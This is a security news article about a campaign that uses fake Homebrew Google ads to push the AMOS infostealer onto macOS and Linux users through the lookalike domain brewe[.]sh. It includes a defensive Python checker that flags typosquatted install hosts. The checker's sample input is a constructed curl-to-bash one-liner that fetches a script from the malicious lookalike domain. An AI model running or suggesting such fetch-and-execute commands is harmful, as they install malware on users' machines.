Fake Homebrew Infects macOS and Linux Machines with infostealer

📟 News

Date: 22/01/2025

Attackers use Google ads to disguise themselves as the Homebrew website and distribute malware targeting Mac and Linux systems and stealing logon credentials, browser data, and cryptocurrency wallets.

The first to discover malicious Google ads was security researcher Ryan Chenkie. According to Bleeping Computer, the malware used in this campaign is AmosStealer (aka Atomic). This infostealer is designed for systems running macOS and is available as a subscription ($1,000 per month).

In the past, this malware was spotted in other malvertising campaigns promoting fake Google Meet pages. According to researchers, AmosStealer is currently the main infostealer for hackers targeting Apple users.

Homebrew is a third-party package manager for macOS and Linux whose popularity is being exploited by criminals. Malvertisements spotted on Google displayed the correct URL brew.sh, which misled even users familiar with the project. However, these ads actually redirected victims to a fake Homebrew website located at brewe[.]sh.

Malicious ad (source: @ryanchenkie)

It must be noted that malefactors have been using this tactic (i.e. displaying trusted URLs in their ads to trick users into visiting supposedly official sites) for a long time. Earlier, experts found similar malicious ads disguised as Google Authenticator and Google Ads.

In the new malware campaign, the potential victim lands on the fake website and is prompted to install Homebrew by pasting a command shown on the page into the macOS Terminal or a Linux shell prompt. Importantly, the real Homebrew website prompts the user to execute a similar command to install the legitimate software, so the step itself looks familiar. But after the command from the fake website is executed, the Amos infostealer is downloaded to the user’s device; this malware targets over 50 cryptocurrency extensions, desktop wallets (including Binance, Coinomi, Electrum, and Exodus), and data stored in web browsers.
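Because the fake and genuine install steps look alike, the only reliable signal a user has before running a pasted one-liner is where it fetches from. The following is an added example (not code from the article or from the Homebrew project) that extracts every URL host from a pasted command, checks it against an allowlist, and flags hosts that are a letter or two away from a trusted one, such as brewe.sh versus brew.sh; the allowlist and the "fake" sample are constructed assumptions, while the genuine sample is Homebrew's publicly documented one-liner.

```python
import re
from urllib.parse import urlparse

# Hosts the genuine Homebrew install one-liner fetches from
# (assumption: allowlist maintained by the reader).
ALLOWED_HOSTS = {"brew.sh", "raw.githubusercontent.com", "github.com"}

URL_RE = re.compile(r'https?://[^\s"\'()]+')


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot typosquats of trusted hosts."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def vet_install_command(cmd: str) -> dict:
    """Extract every URL host from a pasted command and judge it against the allowlist."""
    hosts = [urlparse(u).hostname or "" for u in URL_RE.findall(cmd)]
    findings = []
    if not hosts:
        findings.append("no URL found; refusing to vet an opaque command")
    for host in hosts:
        if host in ALLOWED_HOSTS:
            continue
        # A host within two edits of a trusted one is the classic typosquat pattern.
        near = sorted(h for h in ALLOWED_HOSTS if edit_distance(host, h) <= 2)
        if near:
            findings.append(f"{host} looks like {near[0]} (possible typosquat)")
        else:
            findings.append(f"{host} is not an allowlisted host")
    return {"ok": not findings, "hosts": hosts, "findings": findings}


# Constructed samples: the publicly documented Homebrew one-liner, and a fake
# modelled on the lookalike domain the article names (not the real campaign command).
GENUINE = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
FAKE = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'

if __name__ == "__main__":
    for label, cmd in (("genuine", GENUINE), ("fake", FAKE)):
        print(label, vet_install_command(cmd))
```

The check is only as good as the allowlist: it catches a lookalike host, not a compromised trusted one, so it complements rather than replaces reading the script before running it.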

Fake website (source: @ryanchenkie)

Homebrew’s project leader, Mike McQuaid, told journalists that the Homebrew developers are aware of the situation, but emphasized that it’s beyond their control, criticizing Google for its lack of scrutiny.

“There’s little we can do about this really, it keeps happening again and again and Google seems to like taking money from scammers. Please signal-boost this and hopefully someone at Google will fix this for good,” McQuaid said.
